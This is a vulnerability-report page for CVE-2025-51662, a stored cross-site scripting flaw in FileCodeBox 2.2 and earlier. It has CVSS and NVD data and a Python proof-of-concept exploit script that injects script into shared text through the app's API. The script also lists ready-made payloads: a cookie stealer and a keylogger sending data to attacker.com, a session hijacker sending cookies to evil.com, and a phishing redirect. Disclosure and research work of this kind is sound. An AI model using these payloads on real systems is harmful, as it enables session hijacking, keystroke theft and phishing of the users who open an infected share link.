Security Vulnerability Report
CVE-2025-51662 CVSS 5.4 MEDIUM

CVE-2025-51662

Published: 2025-11-19 20:15:53
Last Modified: 2025-11-24 19:40:24

Description

A stored cross-site scripting (XSS) vulnerability exists in the text sharing feature of FileCodeBox version 2.2 and earlier. Insufficient input validation allows attackers to inject arbitrary JavaScript code into shared text "codeboxes". The XSS payload executes automatically in the browser of any user who accesses the infected codebox by clicking the link or entering the share code.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:lanol:filecodebox:*:*:*:*:*:*:*:* - VULNERABLE
FileCodeBox <= 2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-51662 Stored XSS PoC for FileCodeBox
# This PoC demonstrates the XSS vulnerability in FileCodeBox text sharing feature
import requests
import json

TARGET_URL = "http://target-filecodebox.com"

# XSS payload - can be customized for different attack scenarios
xss_payload = '<script>alert(document.cookie)</script>'


# Method 1: Exploit via API endpoint
def exploit_via_api():
    """Send malicious payload through FileCodeBox API"""
    api_url = f"{TARGET_URL}/api/share"
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    # Malicious payload disguised as normal text
    data = {
        "content": f"Normal text content {xss_payload} more text",
        "expiry": "1h",
        "password": ""
    }
    try:
        response = requests.post(api_url, json=data, headers=headers, timeout=10)
        if response.status_code == 200:
            result = response.json()
            share_code = result.get("code", "")
            print(f"[+] XSS payload injected successfully!")
            print(f"[+] Share code: {share_code}")
            print(f"[+] Access URL: {TARGET_URL}/box/{share_code}")
            print(f"[!] Any user accessing this link will trigger the XSS")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False


# Method 2: Exploit via web interface (requires session)
def exploit_via_web(session):
    """Send malicious payload through web interface"""
    submit_url = f"{TARGET_URL}/submit"
    data = {
        "content": xss_payload,
        "expiry": "24h"
    }
    try:
        response = session.post(submit_url, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Web interface exploitation successful")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False


# Advanced payload examples
advanced_payloads = {
    "cookie_stealer": '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>',
    "session_hijack": '<img src=x onerror="fetch(\'https://evil.com/log?data=\'+btoa(document.cookie))">',
    "phishing_redirect": '<script>window.location="https://fake-bank.com/phish"</script>',
    "keylogger": '<script>document.onkeypress=function(e){fetch("https://attacker.com/klog?k="+e.key)}</script>'
}

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-51662 FileCodeBox Stored XSS Exploitation")
    print("=" * 60)
    exploit_via_api()
```

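References

https://github.com/vastsa/FileCodeBox (Product)
https://github.com/vastsa/FileCodeBox/issues/351 (Exploit, Issue Tracking)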

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-51662", "sourceIdentifier": "[email protected]", "published": "2025-11-19T20:15:53.017", "lastModified": "2025-11-24T19:40:24.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability is found in the text sharing feature of FileCodeBox version 2.2 and earlier. Insufficient input validation allows attackers to inject arbitrary JavaScript code into shared text \"codeboxes\". The xss payload is automatically executed in the browsers of any users who try to access the infected codebox by clicking link or entering share code."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lanol:filecodebox:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.2", "matchCriteriaId": "F79F1C73-2F99-49E2-8B8F-64900B8E51FB"}]}]}], "references": [{"url": "https://github.com/vastsa/FileCodeBox", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vastsa/FileCodeBox/issues/351", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/vastsa/FileCodeBox/issues/351", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}